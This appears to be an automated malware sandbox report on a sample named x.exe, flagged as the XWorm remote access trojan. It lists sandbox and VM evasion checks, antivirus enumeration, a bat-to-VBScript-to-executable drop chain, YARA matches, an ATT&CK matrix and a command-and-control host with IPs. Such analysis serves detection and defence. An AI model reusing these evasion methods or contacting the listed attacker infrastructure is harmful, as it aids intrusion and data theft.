                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Check if machine is in data center or colocation facility
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Local\Temp\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: x.exe, 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: cscript.exe, 00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000006.00000003.2145895375.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000006.00000003.2145771458.000002A3F8DD7000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000007.00000000.2151434038.0000000000562000.00000002.00000001.01000000.00000008.sdmp, Hoodbyunlock.exe.7.dr, x.exe.6.drBinary or memory string: SBIEDLL.DLL#KSZVGBL06VWR84HGFETN0WXLHJI1O8UY4QG3MEWULJLFLFW9FPOPRR2C94C3NDJW0PVEEI7CAK1MNHMEVJ6MNIBRRHHCHKDHQDFJ8VI3097IILLQVKFM3DCESEI6ETL5UIBWATBN9HJR0Z4H8F9HEEYVCELYJKLXPLGA7ZKPMDEZLKF1ST4C60UWYIWPYK8HWUTTHLDNNWR8LQSF0ESQFHLOLPSWBEWSRUL8ZCOABVHCHMKZCT8HEWETSGIKBWD9E9VMCZFFA7ORAJETEHHVNT74M1VXOLVAQKNVD0LYWRDBLBGWSLZ4JIFPDOECDY8US9KEPWYEWNHSFQRZI5ZFPYPF1VLWHCDW9U3WKCVWYZDRZUOOO3UN3DECA56EHZI08MG4YZXWI55K27FRXRTJ8R7SMFRNM20DVJB2AZZWGEKEQRI7PRNJFXQYAQ6QWUMFDH78ZWAIQ7YKDGUYWFO7NATMYEA5EW254WM9LJYW3NAQEVMCAMRI3JE35ZQ5CM8AHIQBGWZS2FDWA3DECNSHNGAWXSG4DUXK7XOYQIP2JRGBNP5G5PX4OBZKB7FKO5CRHTE8HSHLW13MFT2OQZCMYFCO0HPQXAOXOOWKHAWIZXSZWQUOQLIK9INFO
                      Source: C:\Users\user\Desktop\x.exeMemory allocated: 2E90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\x.exeMemory allocated: 1B070000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: BD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 1A890000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeWindow / User API: threadDelayed 9759Jump to behavior
                      Source: C:\Users\user\Desktop\x.exe TID: 6416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2616Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: Amcache.hve.11.drBinary or memory string: VMware
                      Source: Amcache.hve.11.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.11.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.11.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.11.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.11.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.11.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.11.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.11.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.11.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.11.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: x.exe, 00000007.00000002.3113363388.000000001B750000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.11.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.11.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin`
                      Source: x.exe.6.drBinary or memory string: vmware
                      Source: Amcache.hve.11.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.11.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.11.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.11.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.11.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.11.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.11.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.11.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.11.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.11.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.11.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.11.drBinary or memory string: vmci.inf_amd64_68ed49469341f563

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_00007FF847027301 CheckRemoteDebuggerPresent,7_2_00007FF847027301
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\x.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\x.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /e "'v" "C:\Users\user\AppData\Local\Temp\4EuTqZFB.bat"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
                      Source: C:\Users\user\Desktop\x.exeQueries volume information: C:\Users\user\Desktop\x.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.11.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.11.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: x.exe, 00000007.00000002.3113363388.000000001B750000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000007.00000002.3113363388.000000001B7D3000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000007.00000002.3113363388.000000001B807000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: Amcache.hve.11.drBinary or memory string: MsMpEng.exe
                      Source: C:\Users\user\AppData\Local\Temp\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected XWorm
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8e09dd0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8e09dd0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f936cf80.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.x.exe.128a1a78.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8d843d0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8d843d0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.x.exe.560000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8e09dd0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.x.exe.128a1a78.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8d843d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8e09dd0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2145895375.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.2151434038.0000000000562000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2145801874.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2145771458.000002A3F8DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cscript.exe PID: 1272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 5808, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\Hoodbyunlock.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Yara detected XWorm
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8e09dd0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8e09dd0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8d843d0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8d843d0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f936cf80.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f936cf80.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8d843d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.x.exe.128a1a78.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8d843d0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8d843d0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.x.exe.560000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8e09dd0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.x.exe.128a1a78.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8d843d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.cscript.exe.2a3f8e09dd0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000003.2146063182.000002A3F8E09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2147613945.000002A3F936B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2145964652.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2145895375.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3113116268.0000000012891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.2151434038.0000000000562000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2145801874.000002A3F8D84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2145771458.000002A3F8DD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3111840440.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cscript.exe PID: 1272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 5808, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\Hoodbyunlock.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information22
                      Scripting                      		Valid Accounts12
                      Windows Management Instrumentation                      		22
                      Scripting                      		11
                      Process Injection                      		1
                      Masquerading                      		OS Credential Dumping541
                      Security Software Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job2
                      Registry Run Keys / Startup Folder                      		2
                      Registry Run Keys / Startup Folder                      		1
                      Disable or Modify Tools                      		LSASS Memory151
                      Virtualization/Sandbox Evasion                      		Remote Desktop Protocol1
                      Clipboard Data                      		1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		151
                      Virtualization/Sandbox Evasion                      		Security Account Manager1
                      Application Window Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Ingress Tool Transfer                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection                      		NTDS1
                      System Network Configuration Discovery                      		Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets1
                      File and Directory Discovery                      		SSHKeylogging12
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
                      Obfuscated Files or Information                      		Cached Domain Credentials23
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Software Packing                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1504726 Sample: x.exe Startdate: 05/09/2024 Architecture: WINDOWS Score: 100 46 ip-api.com 2->46 48 character-acquisitions.gl.at.ply.gg 2->48 56 Multi AV Scanner detection for domain / URL 2->56 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 21 other signatures 2->62 9 x.exe 4 2->9         started        signatures3 process4 file5 36 C:\Users\user\AppData\Local\...\4EuTqZFB.bat, DOS 9->36 dropped 38 C:\Users\user\AppData\Local\...\x.exe.log, CSV 9->38 dropped 12 cmd.exe 3 9->12         started        16 conhost.exe 9->16         started        process6 file7 40 C:\Users\user\AppData\Local\Temp\x.vbs, ASCII 12->40 dropped 42 C:\Users\user\AppData\Local\Temp\x, ASCII 12->42 dropped 74 Potential malicious VBS script found (has network functionality) 12->74 76 Command shell drops VBS files 12->76 18 x.exe 14 5 12->18         started        23 cscript.exe 2 12->23         started        25 conhost.exe 12->25         started        27 findstr.exe 1 12->27         started        signatures8 process9 dnsIp10 50 ip-api.com 208.95.112.1, 49720, 80 TUT-ASUS United States 18->50 52 character-acquisitions.gl.at.ply.gg 147.185.221.17, 36301, 49722, 49727 SALSGIVERUS United States 18->52 54 127.0.0.1 unknown unknown 18->54 32 C:\ProgramData\Hoodbyunlock.exe, PE32 18->32 dropped 64 Antivirus detection for dropped file 18->64 66 Multi AV Scanner detection for dropped file 18->66 68 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 18->68 72 3 other signatures 18->72 29 WerFault.exe 19 16 18->29         started        34 C:\Users\user\AppData\Local\Temp\x.exe, PE32 23->34 dropped 70 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 23->70 file11 signatures12 process13 file14 44 C:\ProgramData\Microsoft\...\Report.wer, Unicode 29->44 dropped

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
